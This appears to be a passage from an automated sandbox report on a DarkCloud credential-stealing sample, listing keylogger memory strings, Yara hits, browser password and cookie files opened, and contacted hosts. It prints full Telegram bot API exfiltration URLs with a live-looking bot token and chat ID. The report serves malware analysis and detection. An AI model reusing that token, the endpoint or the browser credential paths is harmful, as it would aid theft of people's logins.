Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000061F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:39]<<Program Manager>>
Source: KeyDataovGFJnlG.txt.0.dr Binary or memory string: [07:56:32]<<Program Manager>>
Source: KeyDataHhUnZmvD.txt.0.dr Binary or memory string: [07:56:21]<<Program Manager>>
Source: KeyDataZWdrgPWC.txt.0.dr Binary or memory string: [07:56:10]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ThunderRT6PictureBoxDCdnsapi.dll,-10355:25]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000061F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812933869.000000000061F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:27]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000061F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:38]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1404206426.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:05]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812933869.000000000065F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124:23]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000061F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:33]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000061F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:22]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ThunderRT6PictureBox[07:55:40]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000061F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812933869.000000000061F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:44]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000061F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:29]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.0000000000616000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812933869.0000000000616000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: r_:39]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1404206426.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:07]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000061F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:46]<<Program Manager>>
Source: KeyDataZWdrgPWC.txt.0.dr Binary or memory string: [07:56:11]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000061F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:32]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000061F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:24]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000061F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812933869.000000000061F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:48]<<Program Managerypeof a?a:void 0}
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000061F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:37]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000061F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:23]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000061F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812933869.000000000061F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:45]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000061F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:40]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812933869.000000000065F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 32]<<Program Manager>>
Source: KeyDataOebbnOVW.txt.0.dr Binary or memory string: [07:55:59]<<Program Manager>>
Source: KeyDataovGFJnlG.txt.0.dr Binary or memory string: [07:56:33]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1404206426.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:06]<<Program Manager>>
Source: KeyDatansgiHqmX.txt.0.dr Binary or memory string: [07:56:55]<<Program Manager>>
Source: MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000065F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1812549371.0000000003467000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891150037.000000000061F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [07:55:28]<<Program Manager>>

Stealing of Sensitive Information
barindex
Yara detected DarkCloud
Source: Yara match File source: MSM8C42iAN.exe, type: SAMPLE
Source: Yara match File source: 0.0.MSM8C42iAN.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.1332379073.0000000000401000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MSM8C42iAN.exe PID: 2220, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\MSM8C42iAN.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\MSM8C42iAN.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: MSM8C42iAN.exe PID: 2220, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected DarkCloud
Source: Yara match File source: MSM8C42iAN.exe, type: SAMPLE
Source: Yara match File source: 0.0.MSM8C42iAN.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.1332379073.0000000000401000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MSM8C42iAN.exe PID: 2220, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1562316 Sample: MSM8C42iAN.exe Startdate: 25/11/2024 Architecture: WINDOWS Score: 100 13 api.telegram.org 2->13 15 showip.net 2->15 21 Suricata IDS alerts for network traffic 2->21 23 Found malware configuration 2->23 25 Antivirus / Scanner detection for submitted sample 2->25 29 6 other signatures 2->29 7 MSM8C42iAN.exe 34 2->7         started        signatures3 27 Uses the Telegram API (likely for C&C communication) 13->27 process4 dnsIp5 17 api.telegram.org 149.154.167.220, 443, 49810, 49819 TELEGRAMRU United Kingdom 7->17 19 showip.net 162.55.60.2, 49727, 80 ACPCA United States 7->19 31 Tries to harvest and steal browser information (history, passwords, etc) 7->31 33 Writes or reads registry keys via WMI 7->33 11 WmiPrvSE.exe 7->11         started        signatures6 process7
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU false
162.55.60.2
 showip.net United States
35893 ACPCA false

Contacted Domains

Name IP Active
showip.net 162.55.60.2 true
s-part-0035.t-0009.t-msedge.net 13.107.246.63 true
api.telegram.org 149.154.167.220 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://api.telegram.org/bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115850689&caption=DC-KL:::user-PC\user\8.46.123.75 false
    		high
    https://api.telegram.org/bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115850689&caption=DC-SC:::user-PC\user\8.46.123.75 false
      		high